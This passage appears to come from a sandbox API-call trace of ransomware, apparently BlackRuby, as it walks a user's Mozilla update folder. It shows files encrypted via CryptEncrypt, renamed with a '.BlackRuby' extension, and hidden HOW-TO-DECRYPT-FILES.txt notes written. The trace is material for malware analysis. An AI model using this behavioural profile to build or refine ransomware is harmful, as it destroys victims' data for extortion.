lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\Encrypted_gOk3Z5YgvsA4rzwuga8Os9o9xWTHThaiZfaP5XGn.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e7a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\Encrypted_gOk3Z5YgvsA4rzwuga8Os9o9xWTHThaiZfaP5XGn.BlackRuby", lpFilePart=0x0) returned 0x7c [0049.932] GetLastError () returned 0xb7 [0049.932] SetErrorMode (uMode=0x1) returned 0x0 [0049.932] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\active-update.xml"), fInfoLevelId=0x0, lpFileInformation=0x18ec24 | out: lpFileInformation=0x18ec24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9cb9000, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xc0b9cc0, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x25f6c2c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x570)) returned 1 [0049.933] GetLastError () returned 0xb7 [0049.933] SetErrorMode (uMode=0x0) returned 0x1 [0049.933] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\active-update.xml" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\active-update.xml"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\Encrypted_gOk3Z5YgvsA4rzwuga8Os9o9xWTHThaiZfaP5XGn.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\encrypted_gok3z5ygvsa4rzwuga8os9o9xwththaizfap5xgn.blackruby")) returned 1 [0049.933] GetLastError () returned 0xb7 [0049.933] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x58 [0049.933] GetLastError () returned 0xb7 [0049.933] SetErrorMode (uMode=0x1) returned 0x0 [0049.933] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.933] GetLastError () returned 0x0 [0049.934] GetFileType (hFile=0x184) returned 0x1 [0049.934] SetErrorMode (uMode=0x0) returned 0x1 [0049.934] GetFileType (hFile=0x184) returned 0x1 [0049.936] CloseHandle (hObject=0x184) returned 1 [0049.936] GetLastError () returned 0x0 [0049.936] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x58 [0049.936] GetLastError () returned 0x0 [0049.936] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.936] GetLastError () returned 0x0 [0049.936] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates.xml", nBufferLength=0x105, lpBuffer=0x18e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates.xml", lpFilePart=0x0) returned 0x4b [0049.936] GetLastError () returned 0x0 [0049.936] SetErrorMode (uMode=0x1) returned 0x0 [0049.936] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates.xml" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\updates.xml"), fInfoLevelId=0x0, lpFileInformation=0x1d37d44 | out: lpFileInformation=0x1d37d44*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9d052c0, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xc0dfe20, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xc0dfe20, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x39)) returned 1 [0049.937] GetLastError () returned 0x0 [0049.937] SetErrorMode (uMode=0x0) returned 0x1 [0049.937] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates.xml", nBufferLength=0x105, lpBuffer=0x18e7a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates.xml", lpFilePart=0x0) returned 0x4b [0049.937] GetLastError () returned 0x0 [0049.937] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates.xml", nBufferLength=0x105, lpBuffer=0x18e678, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates.xml", lpFilePart=0x0) returned 0x4b [0049.937] GetLastError () returned 0x0 [0049.937] SetErrorMode (uMode=0x1) returned 0x0 [0049.937] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates.xml" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\updates.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.937] GetLastError () returned 0x0 [0049.937] GetFileType (hFile=0x184) returned 0x1 [0049.937] SetErrorMode (uMode=0x0) returned 0x1 [0049.937] GetFileType (hFile=0x184) returned 0x1 [0049.938] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ec2c | out: lpFileSizeHigh=0x18ec2c*=0x0) returned 0x39 [0049.938] GetLastError () returned 0x0 [0049.938] ReadFile (in: hFile=0x184, lpBuffer=0x1d39e10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ebd4, lpOverlapped=0x0 | out: lpBuffer=0x1d39e10*, lpNumberOfBytesRead=0x18ebd4*=0x39, lpOverlapped=0x0) returned 1 [0049.939] GetLastError () returned 0x0 [0049.939] CloseHandle (hObject=0x184) returned 1 [0049.939] GetLastError () returned 0x0 [0049.939] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates.xml", nBufferLength=0x105, lpBuffer=0x18e788, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates.xml", lpFilePart=0x0) returned 0x4b [0049.939] GetLastError () returned 0x0 [0049.939] SetErrorMode (uMode=0x1) returned 0x0 [0049.939] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates.xml" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\updates.xml"), fInfoLevelId=0x0, lpFileInformation=0x18ec3c | out: lpFileInformation=0x18ec3c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9d052c0, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xc0dfe20, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xc0dfe20, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x39)) returned 1 [0049.939] GetLastError () returned 0x0 [0049.939] SetErrorMode (uMode=0x0) returned 0x1 [0049.952] CryptImportKey (in: hProv=0x37c818, pbData=0x1b96128, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb78 | out: phKey=0x18eb78*=0x360ae0) returned 1 [0049.952] GetLastError () returned 0x0 [0049.952] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.952] GetLastError () returned 0x0 [0049.957] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.957] GetLastError () returned 0x0 [0049.957] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eb34 | out: phKey=0x18eb34*=0x360de0) returned 1 [0049.957] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.957] GetLastError () returned 0x0 [0049.957] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1bc3174*=0x1, dwFlags=0x0) returned 1 [0049.957] GetLastError () returned 0x0 [0049.957] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1bc3140, dwFlags=0x0) returned 1 [0049.957] GetLastError () returned 0x0 [0049.957] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bc31bc*, pdwDataLen=0x18ebc4*=0x130, dwBufLen=0x130 | out: pbData=0x1bc31bc*, pdwDataLen=0x18ebc4*=0x130) returned 1 [0049.957] GetLastError () returned 0x0 [0049.957] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bc3448*, pdwDataLen=0x18ebdc*=0x10, dwBufLen=0x10 | out: pbData=0x1bc3448*, pdwDataLen=0x18ebdc*=0x10) returned 1 [0049.957] GetLastError () returned 0x0 [0049.957] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bc3478*, pdwDataLen=0x18ebe4*=0x0, dwBufLen=0x10 | out: pbData=0x1bc3478*, pdwDataLen=0x18ebe4*=0x10) returned 1 [0049.957] GetLastError () returned 0x0 [0049.957] CryptDestroyKey (hKey=0x360ae0) returned 1 [0049.957] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0049.957] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0049.957] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates.xml", nBufferLength=0x105, lpBuffer=0x18e680, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates.xml", lpFilePart=0x0) returned 0x4b [0049.958] GetLastError () returned 0x0 [0049.958] SetErrorMode (uMode=0x1) returned 0x0 [0049.959] GetFileType (hFile=0x184) returned 0x1 [0049.959] GetFileType (hFile=0x184) returned 0x1 [0049.960] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates.xml" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\updates.xml"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\Encrypted_TFmFe89UGVrMJsIeorJdP5EkBwaGK4yck5cL7axsDaUBXWk.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\encrypted_tfmfe89ugvrmjsieorjdp5ekbwagk4yck5cl7axsdaubxwk.blackruby")) returned 1 [0049.960] GetLastError () returned 0xb7 [0049.961] SetErrorMode (uMode=0x0) returned 0x1 [0049.961] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates", nBufferLength=0x105, lpBuffer=0x18e7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates", lpFilePart=0x0) returned 0x47 [0049.961] GetLastError () returned 0x5 [0049.961] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.961] GetLastError () returned 0x5 [0049.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.962] GetLastError () returned 0x5 [0049.962] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates", lpFilePart=0x0) returned 0x47 [0049.962] GetLastError () returned 0x5 [0049.962] SetErrorMode (uMode=0x1) returned 0x0 [0049.962] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0049.962] GetLastError () returned 0x5 [0049.962] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.962] GetLastError () returned 0x5 [0049.962] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.962] GetLastError () returned 0x5 [0049.962] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.962] GetLastError () returned 0x12 [0049.962] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0049.962] SetErrorMode (uMode=0x0) returned 0x1 [0049.963] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates", lpFilePart=0x0) returned 0x47 [0049.963] GetLastError () returned 0x12 [0049.963] SetErrorMode (uMode=0x1) returned 0x0 [0049.963] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0049.963] GetLastError () returned 0x12 [0049.963] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.963] GetLastError () returned 0x12 [0049.963] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.963] GetLastError () returned 0x12 [0049.963] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.963] GetLastError () returned 0x12 [0049.963] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0049.963] SetErrorMode (uMode=0x0) returned 0x1 [0049.963] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0", lpFilePart=0x0) returned 0x49 [0049.963] GetLastError () returned 0x12 [0049.963] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.963] GetLastError () returned 0x12 [0049.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.964] GetLastError () returned 0x12 [0049.964] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0", lpFilePart=0x0) returned 0x49 [0049.964] GetLastError () returned 0x12 [0049.964] SetErrorMode (uMode=0x1) returned 0x0 [0049.964] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0049.964] GetLastError () returned 0x12 [0049.964] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.964] GetLastError () returned 0x12 [0049.964] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.964] GetLastError () returned 0x12 [0049.964] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.964] GetLastError () returned 0x12 [0049.964] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.964] GetLastError () returned 0x12 [0049.965] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0049.965] SetErrorMode (uMode=0x0) returned 0x1 [0049.965] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0", lpFilePart=0x0) returned 0x49 [0049.965] GetLastError () returned 0x12 [0049.965] SetErrorMode (uMode=0x1) returned 0x0 [0049.965] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0049.965] GetLastError () returned 0x12 [0049.965] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.965] GetLastError () returned 0x12 [0049.965] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.965] GetLastError () returned 0x12 [0049.965] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.965] GetLastError () returned 0x12 [0049.965] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.965] GetLastError () returned 0x12 [0049.966] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0049.966] SetErrorMode (uMode=0x0) returned 0x1 [0049.966] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\update.mar", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\update.mar", lpFilePart=0x0) returned 0x54 [0049.966] GetLastError () returned 0x12 [0049.966] SetErrorMode (uMode=0x1) returned 0x0 [0049.966] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\update.mar" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\updates\\0\\update.mar"), fInfoLevelId=0x0, lpFileInformation=0x1be4d88 | out: lpFileInformation=0x1be4d88*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88f55f80, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x88f55f80, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xa664960, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x1b7740)) returned 1 [0049.966] GetLastError () returned 0x12 [0049.966] SetErrorMode (uMode=0x0) returned 0x1 [0049.967] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x62 [0049.967] GetLastError () returned 0x12 [0049.967] SetErrorMode (uMode=0x1) returned 0x0 [0049.967] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\updates\\0\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.967] GetLastError () returned 0x0 [0049.967] GetFileType (hFile=0x184) returned 0x1 [0049.967] SetErrorMode (uMode=0x0) returned 0x1 [0049.967] GetFileType (hFile=0x184) returned 0x1 [0049.967] WriteFile (in: hFile=0x184, lpBuffer=0x1c0080c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18eb10, lpOverlapped=0x0 | out: lpBuffer=0x1c0080c*, lpNumberOfBytesWritten=0x18eb10*=0x18da, lpOverlapped=0x0) returned 1 [0049.968] GetLastError () returned 0x0 [0049.968] CloseHandle (hObject=0x184) returned 1 [0049.970] GetLastError () returned 0x0 [0049.970] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x62 [0049.970] GetLastError () returned 0x0 [0049.970] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.971] GetLastError () returned 0x0 [0049.971] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\update.status", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\update.status", lpFilePart=0x0) returned 0x57 [0049.971] GetLastError () returned 0x0 [0049.971] SetErrorMode (uMode=0x1) returned 0x0 [0049.971] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\update.status" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\updates\\0\\update.status"), fInfoLevelId=0x0, lpFileInformation=0x1c02548 | out: lpFileInformation=0x1c02548*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9c6cd40, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x9c6cd40, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x9c6cd40, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0xc)) returned 1 [0049.971] GetLastError () returned 0x0 [0049.971] SetErrorMode (uMode=0x0) returned 0x1 [0049.972] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x62 [0049.972] GetLastError () returned 0x0 [0049.972] SetErrorMode (uMode=0x1) returned 0x0 [0049.972] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\updates\\308046B0AF4A39CB\\updates\\0\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\updates\\308046b0af4a39cb\\updates\\0\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.972] GetLastError () returned 0x5 [0049.973] SetErrorMode (uMode=0x0) returned 0x1 [0049.974] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x23 [0049.974] GetLastError () returned 0x5 [0049.975] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temporary Internet Files", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temporary Internet Files", lpFilePart=0x0) returned 0x37 [0049.975] GetLastError () returned 0x5 [0049.975] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.975] GetLastError () returned 0x5 [0049.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.975] GetLastError () returned 0x5 [0049.975] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temporary Internet Files", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temporary Internet Files", lpFilePart=0x0) returned 0x37 [0049.975] GetLastError () returned 0x5 [0049.975] SetErrorMode (uMode=0x1) returned 0x0 [0049.975] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0049.975] GetLastError () returned 0x5 [0049.977] SetErrorMode (uMode=0x0) returned 0x1 [0049.977] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\VirtualStore", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\VirtualStore", lpFilePart=0x0) returned 0x2b [0049.977] GetLastError () returned 0x5 [0049.977] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.977] GetLastError () returned 0x5 [0049.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: 